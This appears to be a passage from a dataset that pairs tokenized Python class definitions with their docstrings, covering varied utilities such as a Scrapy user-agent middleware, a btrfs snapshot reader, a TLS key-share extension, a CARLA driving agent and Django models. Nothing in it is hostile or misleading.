class Arg: <NEW_LINE> <INDENT> def __init__(self, name, atype, modifier, size=None, comment=None): <NEW_LINE> <INDENT> self.__name = name <NEW_LINE> self.__type = atype <NEW_LINE> self.__modifier = modifier <NEW_LINE> self.__size = size <NEW_LINE> self.__comment = comment <NEW_LINE> <DEDENT> def get_name(self): <NEW_LINE> <INDENT> return self.__name <NEW_LINE> <DEDENT> def get_type(self): <NEW_LINE> <INDENT> return self.__type <NEW_LINE> <DEDENT> def get_modifier(self): <NEW_LINE> <INDENT> return self.__modifier <NEW_LINE> <DEDENT> def get_size(self): <NEW_LINE> <INDENT> return self.__size <NEW_LINE> <DEDENT> def get_comment(self): <NEW_LINE> <INDENT> return self.__comment <NEW_LINE> <DEDENT> def set_comment(self, comment): <NEW_LINE> <INDENT> self.__comment = comment <NEW_LINE> <DEDENT> def set_type(self, type): <NEW_LINE> <INDENT> self.__type = type
Data container for the port name, type, etc. associated with a component.
62599068aad79263cf42ff5f
class MyUserAgentMiddleware(UserAgentMiddleware): <NEW_LINE> <INDENT> def __init__(self, user_agent): <NEW_LINE> <INDENT> self.user_agent = user_agent <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def from_crawler(cls, crawler): <NEW_LINE> <INDENT> return cls( user_agent=crawler.settings.get('MY_USER_AGENT') ) <NEW_LINE> <DEDENT> def process_request(self, request, spider): <NEW_LINE> <INDENT> agent = random.choice(self.user_agent) <NEW_LINE> request.headers['User-Agent'] = agent
Sets the User-Agent.
625990683539df3088ecda45
class MockRecord: <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.userid = None <NEW_LINE> self.remoteip = None
Mocks a logging construct to receive data to be interpolated.
6259906801c39578d7f14308
class UnknownMsgError(RuntimeError): <NEW_LINE> <INDENT> pass
Exception raised in case of unknown Message.
625990684f88993c371f10f2
class _Reader(io.RawIOBase): <NEW_LINE> <INDENT> def __init__(self, process, stream, path, diff, showProgress): <NEW_LINE> <INDENT> self.process = process <NEW_LINE> self.stream = stream <NEW_LINE> self.path = path <NEW_LINE> self.diff = diff <NEW_LINE> self.bytesRead = None <NEW_LINE> self.progress = DisplayProgress() if showProgress else None <NEW_LINE> <DEDENT> def __enter__(self): <NEW_LINE> <INDENT> self.bytesRead = 0 <NEW_LINE> if self.progress is not None: <NEW_LINE> <INDENT> self.progress.open() <NEW_LINE> <DEDENT> return self <NEW_LINE> <DEDENT> def __exit__(self, exceptionType, exception, trace): <NEW_LINE> <INDENT> self.stream.close() <NEW_LINE> if self.progress is not None: <NEW_LINE> <INDENT> self.progress.close() <NEW_LINE> <DEDENT> if self.process is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> logger.debug("Waiting for send process to finish...") <NEW_LINE> self.process.wait() <NEW_LINE> if self.process.returncode != 0: <NEW_LINE> <INDENT> logger.error("btrfs send errors") <NEW_LINE> for line in self.process.stderr: <NEW_LINE> <INDENT> sys.stderr.write(line) <NEW_LINE> <DEDENT> <DEDENT> if exception is None and self.process.returncode != 0: <NEW_LINE> <INDENT> raise Exception( "send returned error %d. %s may be corrupt." % (self.process.returncode, self.path) ) <NEW_LINE> <DEDENT> <DEDENT> def read(self, size): <NEW_LINE> <INDENT> data = self.stream.read(size) <NEW_LINE> if FIXUP_DURING_SEND and self.bytesRead == 0: <NEW_LINE> <INDENT> data = send.replaceIDs( data, self.diff.toUUID, self.diff.toGen, self.diff.fromUUID, self.diff.fromGen, ) <NEW_LINE> <DEDENT> self.bytesRead += len(data) <NEW_LINE> if self.progress is not None: <NEW_LINE> <INDENT> self.progress.update(self.bytesRead) <NEW_LINE> <DEDENT> return data <NEW_LINE> <DEDENT> def seek(self, offset, whence): <NEW_LINE> <INDENT> self.stream.seek(offset, offset, whence) <NEW_LINE> if whence == io.SEEK_SET: <NEW_LINE> <INDENT> self.bytesRead = offset <NEW_LINE> <DEDENT> elif whence == io.SEEK_CUR: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> elif whence == io.SEEK_END: <NEW_LINE> <INDENT> self.bytesRead = None
Context Manager to read a snapshot.
625990684428ac0f6e659cd9
class Configuration(object): <NEW_LINE> <INDENT> def __init__(self, sections, defs): <NEW_LINE> <INDENT> self.sections = sections <NEW_LINE> self.defs = defs <NEW_LINE> <DEDENT> def ClassifyTests(self, cases, env): <NEW_LINE> <INDENT> sections = [ s for s in self.sections if s.condition.Evaluate(env, self.defs) ] <NEW_LINE> all_rules = reduce(list.__add__, [s.rules for s in sections], []) <NEW_LINE> unused_rules = set(all_rules) <NEW_LINE> result = [] <NEW_LINE> for case in cases: <NEW_LINE> <INDENT> matches = [ r for r in all_rules if r.Contains(case.path) ] <NEW_LINE> outcomes_list = [ r.GetOutcomes(env, self.defs) for r in matches ] <NEW_LINE> outcomes = reduce(set.union, outcomes_list, set()) <NEW_LINE> unused_rules.difference_update(matches) <NEW_LINE> case.outcomes = set(outcomes) or set([PASS]) <NEW_LINE> result.append(case) <NEW_LINE> <DEDENT> return result, unused_rules
The parsed contents of a configuration file
6259906876e4537e8c3f0d2a
class ServerKeyShareExtension(TLSExtension): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> super(ServerKeyShareExtension, self).__init__(extType=ExtensionType. key_share, server=True) <NEW_LINE> self.server_share = None <NEW_LINE> <DEDENT> def create(self, server_share): <NEW_LINE> <INDENT> self.server_share = server_share <NEW_LINE> return self <NEW_LINE> <DEDENT> @property <NEW_LINE> def extData(self): <NEW_LINE> <INDENT> if self.server_share is None: <NEW_LINE> <INDENT> return bytearray(0) <NEW_LINE> <DEDENT> w = Writer() <NEW_LINE> self.server_share.write(w) <NEW_LINE> return w.bytes <NEW_LINE> <DEDENT> def parse(self, parser): <NEW_LINE> <INDENT> if not parser.getRemainingLength(): <NEW_LINE> <INDENT> self.server_share = None <NEW_LINE> return self <NEW_LINE> <DEDENT> self.server_share = KeyShareEntry().parse(parser) <NEW_LINE> if parser.getRemainingLength(): <NEW_LINE> <INDENT> raise DecodeError("Trailing data in server Key Share extension") <NEW_LINE> <DEDENT> return self
Class for handling the Server Hello variant of the Key Share extension. Extension for sending the key share to the client.
62599068adb09d7d5dc0bd11
class ChatRoom(object): <NEW_LINE> <INDENT> def display_message(self, user, message): <NEW_LINE> <INDENT> print("[{} says]: {}".format(user, message))
Mediator class
6259906899cbb53fe683268c
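A minimal, runnable sketch fleshing out the mediator pattern around the ChatRoom above; the User colleague class is added for illustration and is not part of the original entry.

class ChatRoom:
    # Mediator: colleagues talk to each other only through this object.
    def display_message(self, user, message):
        print("[{} says]: {}".format(user, message))

class User:
    # Colleague: delegates delivery to the mediator instead of addressing peers directly.
    def __init__(self, name, chat_room):
        self.name = name
        self.chat_room = chat_room

    def say(self, message):
        self.chat_room.display_message(self.name, message)

room = ChatRoom()
alice = User("Alice", room)
alice.say("Hello!")  # prints "[Alice says]: Hello!"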
class CarlaAdAgent(object): <NEW_LINE> <INDENT> def __init__(self, role_name, target_speed, avoid_risk): <NEW_LINE> <INDENT> self._route_assigned = False <NEW_LINE> self._global_plan = None <NEW_LINE> self._agent = None <NEW_LINE> self._target_speed = target_speed <NEW_LINE> rospy.on_shutdown(self.on_shutdown) <NEW_LINE> vehicle_info = None <NEW_LINE> try: <NEW_LINE> <INDENT> vehicle_info = rospy.wait_for_message( "/carla/{}/vehicle_info".format(role_name), CarlaEgoVehicleInfo) <NEW_LINE> <DEDENT> except rospy.ROSException: <NEW_LINE> <INDENT> rospy.logerr("Timeout while waiting for world info!") <NEW_LINE> sys.exit(1) <NEW_LINE> <DEDENT> self._route_subscriber = rospy.Subscriber( "/carla/{}/waypoints".format(role_name), Path, self.path_updated) <NEW_LINE> self._target_speed_subscriber = rospy.Subscriber( "/carla/{}/target_speed".format(role_name), Float64, self.target_speed_updated) <NEW_LINE> self.vehicle_control_publisher = rospy.Publisher( "/carla/{}/vehicle_control_cmd".format(role_name), CarlaEgoVehicleControl, queue_size=1) <NEW_LINE> self._agent = BasicAgent(role_name, vehicle_info.id, avoid_risk) <NEW_LINE> <DEDENT> def on_shutdown(self): <NEW_LINE> <INDENT> rospy.loginfo("Shutting down, stopping ego vehicle...") <NEW_LINE> if self._agent: <NEW_LINE> <INDENT> self.vehicle_control_publisher.publish(self._agent.emergency_stop()) <NEW_LINE> <DEDENT> <DEDENT> def target_speed_updated(self, target_speed): <NEW_LINE> <INDENT> rospy.loginfo("New target speed received: {}".format(target_speed.data)) <NEW_LINE> self._target_speed = target_speed.data <NEW_LINE> <DEDENT> def path_updated(self, path): <NEW_LINE> <INDENT> rospy.loginfo("New plan with {} waypoints received.".format(len(path.poses))) <NEW_LINE> if self._agent: <NEW_LINE> <INDENT> self.vehicle_control_publisher.publish(self._agent.emergency_stop()) <NEW_LINE> <DEDENT> self._global_plan = path <NEW_LINE> self._route_assigned = False <NEW_LINE> <DEDENT> def run_step(self): <NEW_LINE> <INDENT> control = CarlaEgoVehicleControl() <NEW_LINE> control.steer = 0.0 <NEW_LINE> control.throttle = 0.0 <NEW_LINE> control.brake = 0.0 <NEW_LINE> control.hand_brake = False <NEW_LINE> if not self._agent: <NEW_LINE> <INDENT> rospy.loginfo("Waiting for ego vehicle...") <NEW_LINE> return control <NEW_LINE> <DEDENT> if not self._route_assigned and self._global_plan: <NEW_LINE> <INDENT> rospy.loginfo("Assigning plan...") <NEW_LINE> self._agent._local_planner.set_global_plan( self._global_plan.poses) <NEW_LINE> self._route_assigned = True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> control, finished = self._agent.run_step(self._target_speed) <NEW_LINE> if finished: <NEW_LINE> <INDENT> self._global_plan = None <NEW_LINE> self._route_assigned = False <NEW_LINE> <DEDENT> <DEDENT> return control <NEW_LINE> <DEDENT> def run(self): <NEW_LINE> <INDENT> r = rospy.Rate(10) <NEW_LINE> while not rospy.is_shutdown(): <NEW_LINE> <INDENT> if self._global_plan: <NEW_LINE> <INDENT> control = self.run_step() <NEW_LINE> if control: <NEW_LINE> <INDENT> control.steer = -control.steer <NEW_LINE> self.vehicle_control_publisher.publish(control) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> r.sleep() <NEW_LINE> <DEDENT> except rospy.ROSInterruptException: <NEW_LINE> <INDENT> pass
A basic AD agent using CARLA waypoints
6259906838b623060ffaa425
class OnlyOneOSRepositoryAllowed(Exception): <NEW_LINE> <INDENT> pass
Raised when trying to add more than one OS repository to a collection.
62599068379a373c97d9a7c5
class Uploader(object): <NEW_LINE> <INDENT> TEST_ITEM = "Q4115189" <NEW_LINE> def add_labels(self, target_item, labels): <NEW_LINE> <INDENT> labels_for_upload = {} <NEW_LINE> for label in labels: <NEW_LINE> <INDENT> label_content = label['value'] <NEW_LINE> language = label['language'] <NEW_LINE> labels_for_upload[language] = label_content <NEW_LINE> <DEDENT> self.wdstuff.add_multiple_label_or_alias( labels_for_upload, target_item) <NEW_LINE> <DEDENT> def add_descriptions(self, target_item, descriptions): <NEW_LINE> <INDENT> descriptions_for_upload = {} <NEW_LINE> for description in descriptions: <NEW_LINE> <INDENT> desc_content = description['value'] <NEW_LINE> lang = description['language'] <NEW_LINE> descriptions_for_upload[lang] = desc_content <NEW_LINE> <DEDENT> self.wdstuff.add_multiple_descriptions( descriptions_for_upload, target_item) <NEW_LINE> <DEDENT> def add_claims(self, wd_item, claims): <NEW_LINE> <INDENT> if wd_item: <NEW_LINE> <INDENT> for claim in claims: <NEW_LINE> <INDENT> wd_item.get() <NEW_LINE> prop = claim["prop"] <NEW_LINE> value = claim["value"] <NEW_LINE> ref = claim["ref"] <NEW_LINE> self.wdstuff.addNewClaim(prop, value, wd_item, ref) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def create_new_item(self): <NEW_LINE> <INDENT> return self.wdstuff.make_new_item({}, self.summary) <NEW_LINE> <DEDENT> def get_username(self): <NEW_LINE> <INDENT> return pywikibot.config.usernames["wikidata"]["wikidata"] <NEW_LINE> <DEDENT> def upload(self): <NEW_LINE> <INDENT> if self.data["upload"] is False: <NEW_LINE> <INDENT> print("SKIPPING ITEM") <NEW_LINE> return <NEW_LINE> <DEDENT> labels = self.data["labels"] <NEW_LINE> descriptions = self.data["descriptions"] <NEW_LINE> claims = self.data["statements"] <NEW_LINE> self.add_labels(self.wd_item, labels) <NEW_LINE> self.add_descriptions(self.wd_item, descriptions) <NEW_LINE> self.add_claims(self.wd_item, claims) <NEW_LINE> <DEDENT> def set_wd_item(self): <NEW_LINE> <INDENT> if self.live: <NEW_LINE> <INDENT> if self.data["wd-item"] is None: <NEW_LINE> <INDENT> self.wd_item = self.create_new_item() <NEW_LINE> self.wd_item_q = self.wd_item.getID() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> item_q = self.data["wd-item"] <NEW_LINE> self.wd_item = self.wdstuff.QtoItemPage(item_q) <NEW_LINE> self.wd_item_q = item_q <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> self.wd_item = self.wdstuff.QtoItemPage(self.TEST_ITEM) <NEW_LINE> self.wd_item_q = self.TEST_ITEM <NEW_LINE> <DEDENT> <DEDENT> def __init__(self, data_object, repo, live=False, edit_summary=None): <NEW_LINE> <INDENT> self.repo = repo <NEW_LINE> self.live = live <NEW_LINE> if self.live: <NEW_LINE> <INDENT> print("LIVE MODE") <NEW_LINE> self.summary = edit_summary <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> print("SANDBOX MODE: {}".format(self.TEST_ITEM)) <NEW_LINE> self.summary = SUMMARY_TEST <NEW_LINE> <DEDENT> print("User: {}".format(self.get_username())) <NEW_LINE> print("Edit summary: {}".format(self.summary)) <NEW_LINE> print("---------------") <NEW_LINE> self.data = data_object.wd_item <NEW_LINE> self.wdstuff = WDS(self.repo, edit_summary=self.summary) <NEW_LINE> self.set_wd_item()
Upload a WikidataItem.
62599068f7d966606f74948e
class DIYStage(object): <NEW_LINE> <INDENT> def __init__(self, path): <NEW_LINE> <INDENT> self.archive_file = None <NEW_LINE> self.path = path <NEW_LINE> self.source_path = path <NEW_LINE> self.created = True <NEW_LINE> <DEDENT> def __enter__(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def __exit__(self, exc_type, exc_val, exc_tb): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def fetch(self, *args, **kwargs): <NEW_LINE> <INDENT> tty.msg("No need to fetch for DIY.") <NEW_LINE> <DEDENT> def check(self): <NEW_LINE> <INDENT> tty.msg("No checksum needed for DIY.") <NEW_LINE> <DEDENT> def expand_archive(self): <NEW_LINE> <INDENT> tty.msg("Using source directory: %s" % self.source_path) <NEW_LINE> <DEDENT> def restage(self): <NEW_LINE> <INDENT> tty.die("Cannot restage DIY stage.") <NEW_LINE> <DEDENT> def create(self): <NEW_LINE> <INDENT> self.created = True <NEW_LINE> <DEDENT> def destroy(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def cache_local(self): <NEW_LINE> <INDENT> tty.msg("Sources for DIY stages are not cached")
Simple class that allows any directory to be a spack stage.
625990681b99ca4002290109
class SlideBar(BaseWidget): <NEW_LINE> <INDENT> def __init__(self, func, pos, size, min_=0, max_=100, step=1, color=BLUE, *, bg_color=LIGHT_GREY, show_val=True, interval=1, anchor=CENTER, inital=None, rounding=2, v_type=int): <NEW_LINE> <INDENT> super().__init__(pos, size, anchor) <NEW_LINE> self.color = color <NEW_LINE> self.bg_color = bg_color <NEW_LINE> self.func = func <NEW_LINE> self._value = inital if inital is not None else min_ <NEW_LINE> self.min = min_ <NEW_LINE> self.max = max_ <NEW_LINE> self.step = step <NEW_LINE> self.show_val = show_val <NEW_LINE> self.rounding = rounding <NEW_LINE> self.v_type = v_type <NEW_LINE> font = Font(self.height // 2) <NEW_LINE> self.text_val = SimpleText(self.get, lambda: (self.value_px, self.centery), bw_contrasted(self.color), font) <NEW_LINE> self.interval = interval <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return 'SlideBar({}:{}:{}; {}, Value: {})'.format(self.min, self.max, self.step, super().__repr__(), self.get()) <NEW_LINE> <DEDENT> def get(self): <NEW_LINE> <INDENT> return round(self.v_type(self._value), self.rounding) <NEW_LINE> <DEDENT> def set(self, value): <NEW_LINE> <INDENT> value = min(self.max, max(self.min, value)) <NEW_LINE> self._value = value <NEW_LINE> start_new_thread(self.func, (self.get(),)) <NEW_LINE> <DEDENT> def _start(self): <NEW_LINE> <INDENT> last_call = 42 <NEW_LINE> while self._focus: <NEW_LINE> <INDENT> sleep(1 / 100) <NEW_LINE> mouse = pygame.mouse.get_pos() <NEW_LINE> last_value = self.get() <NEW_LINE> self.value_px = mouse[0] <NEW_LINE> if self.get() == last_value: <NEW_LINE> <INDENT> continue <NEW_LINE> <DEDENT> if last_call + self.interval / 1000 < time(): <NEW_LINE> <INDENT> last_call = time() <NEW_LINE> self.func(self.get()) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def focus(self): <NEW_LINE> <INDENT> self._focus = True <NEW_LINE> start_new_thread(SlideBar._start, (self,)) <NEW_LINE> <DEDENT> @property <NEW_LINE> def value_px(self): <NEW_LINE> <INDENT> step = self.w / (self.max - self.min) <NEW_LINE> return self.x + step * (self.get() - self.min) <NEW_LINE> <DEDENT> @value_px.setter <NEW_LINE> def value_px(self, value): <NEW_LINE> <INDENT> value = min(self.right, max(self.left, value)) <NEW_LINE> delta_x = value - self.x <NEW_LINE> prop = delta_x / self.width <NEW_LINE> real = prop * (self.max - self.min) <NEW_LINE> self._value = self.min + round(real / self.step) * self.step <NEW_LINE> <DEDENT> def render(self, display): <NEW_LINE> <INDENT> bar_rect = pygame.Rect(0, 0, self.width, self.height // 3) <NEW_LINE> bar_rect.center = self.center <NEW_LINE> display.fill(self.bg_color, bar_rect) <NEW_LINE> circle(display, (self.value_px, self.centery), self.height // 2, self.color) <NEW_LINE> if self.show_val: <NEW_LINE> <INDENT> self.text_val.render(display)
A slide bar to pick a value in a range. Don't forget to call focus() and unfocus() when the user clicks on the SlideBar
625990687c178a314d78e7bf
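The pixel-to-value conversion in the value_px setter is a plain linear mapping with step snapping; a standalone sketch of that arithmetic, with hypothetical bar geometry.

def px_to_value(px, x, width, min_, max_, step):
    # Clamp to the bar, convert the pixel offset to a proportion of the range,
    # then snap to the nearest multiple of `step` (mirrors SlideBar.value_px).
    px = min(x + width, max(x, px))
    prop = (px - x) / width
    real = prop * (max_ - min_)
    return min_ + round(real / step) * step

# Hypothetical bar: 200 px wide starting at x=50, values 0..100 in steps of 5.
print(px_to_value(150, x=50, width=200, min_=0, max_=100, step=5))  # -> 50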
class AddCommentsView(View): <NEW_LINE> <INDENT> def post(self,request): <NEW_LINE> <INDENT> if not request.user.is_authenticated: <NEW_LINE> <INDENT> return HttpResponse('{"status":"fail","msg":"用户未登录"}',content_type='application/json') <NEW_LINE> <DEDENT> course_id = request.POST.get("course_id",0) <NEW_LINE> comments = request.POST.get("comments","") <NEW_LINE> if int(course_id) > 0 and comments: <NEW_LINE> <INDENT> course_comments = CourseComments() <NEW_LINE> course = Course.objects.get(id=course_id) <NEW_LINE> course_comments.course = course <NEW_LINE> course_comments.comments = comments <NEW_LINE> course_comments.user = request.user <NEW_LINE> course_comments.save() <NEW_LINE> return HttpResponse('{"status":"success","msg":"添加成功"}', content_type='application/json') <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return HttpResponse('{"status":"fail","msg":"添加失败"}',content_type='application/json')
Add a user comment to a course.
625990687b25080760ed88b5
class MealEntry(Model): <NEW_LINE> <INDENT> MEAL_OPTIONS = ['BREAKFAST', 'LUNCH', 'DINNER', 'SNACK', 'MINI_MEAL'] <NEW_LINE> created = ndb.DateTimeProperty(auto_now_add=True) <NEW_LINE> identity = ndb.StringProperty(choices=MEAL_OPTIONS)
Stores data about a meal
625990683617ad0b5ee078fa
class FirestoreProjectsDatabasesDocumentsWriteRequest(_messages.Message): <NEW_LINE> <INDENT> database = _messages.StringField(1, required=True) <NEW_LINE> writeRequest = _messages.MessageField('WriteRequest', 2)
A FirestoreProjectsDatabasesDocumentsWriteRequest object. Fields: database: The database name. In the format: `projects/{project_id}/databases/{database_id}`. This is only required in the first message. writeRequest: A WriteRequest resource to be passed as the request body.
62599068498bea3a75a591d5
class ExtractionMismatch(PyetcException): <NEW_LINE> <INDENT> def __init__(self, value, results=None): <NEW_LINE> <INDENT> PyetcException.__init__(self, value, results) <NEW_LINE> self.name = "Extracted instances are not the same"
Raised when Extracted instances that should match don't.
625990687047854f46340b5c
class FileUtils(object): <NEW_LINE> <INDENT> _instance = None <NEW_LINE> DRY_RUN = False <NEW_LINE> @classmethod <NEW_LINE> def Configure(cls, dry_run): <NEW_LINE> <INDENT> cls.DRY_RUN = dry_run <NEW_LINE> <DEDENT> def __new__(cls, *args, **kwargs): <NEW_LINE> <INDENT> if not cls._instance: <NEW_LINE> <INDENT> if cls.DRY_RUN: <NEW_LINE> <INDENT> cls._instance = super(FileUtils, cls).__new__(MockFileUtils, *args, **kwargs) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> cls._instance = super(FileUtils, cls).__new__(cls, *args, **kwargs) <NEW_LINE> <DEDENT> <DEDENT> return cls._instance <NEW_LINE> <DEDENT> def Md5File(self, filename, log_level='verbose', _block_size=2**10): <NEW_LINE> <INDENT> command = 'md5sum %s' % filename <NEW_LINE> ce = command_executer.GetCommandExecuter(log_level=log_level) <NEW_LINE> ret, out, _ = ce.RunCommandWOutput(command) <NEW_LINE> if ret: <NEW_LINE> <INDENT> raise RuntimeError('Could not run md5sum on: %s' % filename) <NEW_LINE> <DEDENT> return out.strip().split()[0] <NEW_LINE> <DEDENT> def CanonicalizeChromeOSRoot(self, chromeos_root): <NEW_LINE> <INDENT> chromeos_root = os.path.expanduser(chromeos_root) <NEW_LINE> if os.path.isdir(os.path.join(chromeos_root, 'chromite')): <NEW_LINE> <INDENT> return chromeos_root <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> def ChromeOSRootFromImage(self, chromeos_image): <NEW_LINE> <INDENT> chromeos_root = os.path.join( os.path.dirname(chromeos_image), '../../../../..') <NEW_LINE> return self.CanonicalizeChromeOSRoot(chromeos_root) <NEW_LINE> <DEDENT> def MkDirP(self, path): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> os.makedirs(path) <NEW_LINE> <DEDENT> except OSError as exc: <NEW_LINE> <INDENT> if exc.errno == errno.EEXIST: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> raise <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def RmDir(self, path): <NEW_LINE> <INDENT> shutil.rmtree(path, ignore_errors=True) <NEW_LINE> <DEDENT> def WriteFile(self, path, contents): <NEW_LINE> <INDENT> with open(path, 'wb') as f: <NEW_LINE> <INDENT> f.write(contents)
Utilities for operations on files.
62599068a219f33f346c7fb0
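The Configure/__new__ pairing above is a singleton that swaps in a mock implementation under dry-run. A minimal standalone sketch of that pattern; the class names here are illustrative, not the original ones.

class Runner:
    _instance = None
    DRY_RUN = False

    @classmethod
    def Configure(cls, dry_run):
        cls.DRY_RUN = dry_run

    def __new__(cls, *args, **kwargs):
        # The first instantiation decides which concrete class the singleton uses.
        if not cls._instance:
            target = MockRunner if cls.DRY_RUN else cls
            cls._instance = super(Runner, cls).__new__(target)
        return cls._instance

    def run(self, cmd):
        print("running:", cmd)

class MockRunner(Runner):
    def run(self, cmd):
        print("dry run, skipping:", cmd)

Runner.Configure(dry_run=True)
Runner().run("rm -rf build")  # -> dry run, skipping: rm -rf build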
class Committee(InheritanceGroup): <NEW_LINE> <INDENT> leader = models.ForeignKey( Member, on_delete=models.SET_NULL, verbose_name='leder', related_name='leader_of', blank=True, null=True, ) <NEW_LINE> leader_title = models.CharField('ledertittel', max_length=100, blank=True) <NEW_LINE> members = models.ManyToManyField( Member, verbose_name='medlemmer', related_name='committees', through='CommitteeMembership', ) <NEW_LINE> email = models.EmailField( verbose_name='e-post', max_length=255, unique=True, ) <NEW_LINE> description = models.TextField('beskrivelse', blank=True, default='') <NEW_LINE> order = models.IntegerField( 'rekkefølge', default=0, help_text='Dette angir rekkefølgen komiteene vises i. Lavere tall kommer først.') <NEW_LINE> @property <NEW_LINE> def ordered_members(self): <NEW_LINE> <INDENT> return self.user_set.all().order_by('committee_leader_of', 'is_on_leave', 'first_name', 'last_name') <NEW_LINE> <DEDENT> @property <NEW_LINE> def memberships(self): <NEW_LINE> <INDENT> return self.members.through.objects.filter(committee=self) <NEW_LINE> <DEDENT> class Meta: <NEW_LINE> <INDENT> verbose_name = 'komite' <NEW_LINE> verbose_name_plural = 'komiteer' <NEW_LINE> ordering = ('order',) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return self.name <NEW_LINE> <DEDENT> def add_member(self, member, title=None): <NEW_LINE> <INDENT> attrs = { 'member': member, 'committee': self, } <NEW_LINE> if title: <NEW_LINE> <INDENT> attrs['title'] = title <NEW_LINE> <DEDENT> self.members.through.objects.create(**attrs) <NEW_LINE> <DEDENT> def remove_member(self, member): <NEW_LINE> <INDENT> self.members.through.objects.filter(member=member).delete() <NEW_LINE> <DEDENT> def add_members(self, members): <NEW_LINE> <INDENT> for member in members: <NEW_LINE> <INDENT> self.add_member(member) <NEW_LINE> <DEDENT> <DEDENT> def member_titles(self): <NEW_LINE> <INDENT> return self.members.through.objects.filter(committee=self)
Store a committee.
625990683d592f4c4edbc687
class Fingerprinter(object): <NEW_LINE> <INDENT> sample_methods = [ 'bridge_hand', 'coin_tosses', 'die_rolls', 'floats', 'shuffle', 'words' ] <NEW_LINE> def __init__(self, generator): <NEW_LINE> <INDENT> self.generator = generator <NEW_LINE> self.state = self.generator.getstate() <NEW_LINE> <DEDENT> def bridge_hand(self): <NEW_LINE> <INDENT> return [self.generator.sample(CARDS, 13)] <NEW_LINE> <DEDENT> def coin_tosses(self): <NEW_LINE> <INDENT> return [self.generator.choice(['H', 'T']) for _ in range(100)] <NEW_LINE> <DEDENT> def die_rolls(self): <NEW_LINE> <INDENT> return [self.generator.randint(1, 6) for _ in range(20)] <NEW_LINE> <DEDENT> def floats(self): <NEW_LINE> <INDENT> return [self.generator.random() for _ in range(20)] <NEW_LINE> <DEDENT> def shuffle(self): <NEW_LINE> <INDENT> population = list(range(20)) <NEW_LINE> self.generator.shuffle(population) <NEW_LINE> return population <NEW_LINE> <DEDENT> def words(self): <NEW_LINE> <INDENT> return [self.generator.getrandbits(32) for _ in range(20)] <NEW_LINE> <DEDENT> def fingerprint(self): <NEW_LINE> <INDENT> fingerprint = {} <NEW_LINE> for method_name in self.sample_methods: <NEW_LINE> <INDENT> method = getattr(self, method_name) <NEW_LINE> with restore_state(self.generator): <NEW_LINE> <INDENT> fingerprint[method_name] = method() <NEW_LINE> <DEDENT> <DEDENT> return fingerprint
Generator of "standard" samples, for use in reproducibility tests.
625990687b180e01f3e49c38
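The core trick behind the fingerprint is saving and restoring the generator state so every sampler sees the same stream. A standalone sketch with the stdlib random module; the restore_state helper used above is approximated here with an explicit setstate call.

import random

gen = random.Random(42)
state = gen.getstate()

def sample_die_rolls(g):
    return [g.randint(1, 6) for _ in range(5)]

first = sample_die_rolls(gen)
gen.setstate(state)            # rewind the generator, as restore_state() does
second = sample_die_rolls(gen)
assert first == second         # identical samples -> reproducible fingerprint
print(first)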
class Market(Enum): <NEW_LINE> <INDENT> ROFEX = 'ROFX' <NEW_LINE> MERVAL = 'MERV - XMEV'
Market ID associated with the instruments. ROFEX: ROFEX Exchange.
6259906832920d7e50bc77ef
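A short runnable sketch of how such an Enum is typically used, e.g. mapping a wire value from an API payload back to a member; the lookup value shown is taken from the enum itself.

from enum import Enum

class Market(Enum):
    ROFEX = 'ROFX'
    MERVAL = 'MERV - XMEV'

# Look up a member by its wire value and read the value back.
market = Market('ROFX')
print(market is Market.ROFEX)   # True
print(Market.MERVAL.value)      # 'MERV - XMEV'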
class CorrectText: <NEW_LINE> <INDENT> def __init__( self, lower=True, remove_spaces=True, add_punctuation=True, captalize=True, remove_double_pontuation=True, sent_tokenizer=None): <NEW_LINE> <INDENT> self.config = { "lower" : lower, "remove_spaces": remove_spaces, "add_punctuation": add_punctuation, "captalize": captalize, "remove_double_pontuation": remove_double_pontuation, "sent_tokenizer" : sent_tokenizer } <NEW_LINE> self.end_punctuation = '!.?;' <NEW_LINE> self.double_pontuation = '()[]{}' <NEW_LINE> <DEDENT> def remove_spaces(self, text): <NEW_LINE> <INDENT> text = re.sub(' {2,}', ' ', text) <NEW_LINE> text = re.sub(' ([{}])'.format( re.escape(punctuation)), r'\1', text) <NEW_LINE> return text.strip() <NEW_LINE> <DEDENT> def add_punctuation(self, text): <NEW_LINE> <INDENT> if list(text)[-1] not in punctuation: <NEW_LINE> <INDENT> return text + '.' <NEW_LINE> <DEDENT> return text <NEW_LINE> <DEDENT> def captalize(self, text, sent_tokenizer=None): <NEW_LINE> <INDENT> if self.config['lower']: <NEW_LINE> <INDENT> text = self.lower(text) <NEW_LINE> <DEDENT> if sent_tokenizer == None: <NEW_LINE> <INDENT> text = re.sub('([{}])'.format( re.escape(self.end_punctuation)), r'\1||', text) <NEW_LINE> text_parts = list( filter(lambda _: len(_) > 0, text.split('||')) ) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> text_parts = sent_tokenizer(text) <NEW_LINE> <DEDENT> text_parts_processed = [] <NEW_LINE> for t in text_parts: <NEW_LINE> <INDENT> t = re.sub(',([^ ])', r', \1', t.strip()) <NEW_LINE> words = t.split(' ') <NEW_LINE> text_parts_processed.append( ' 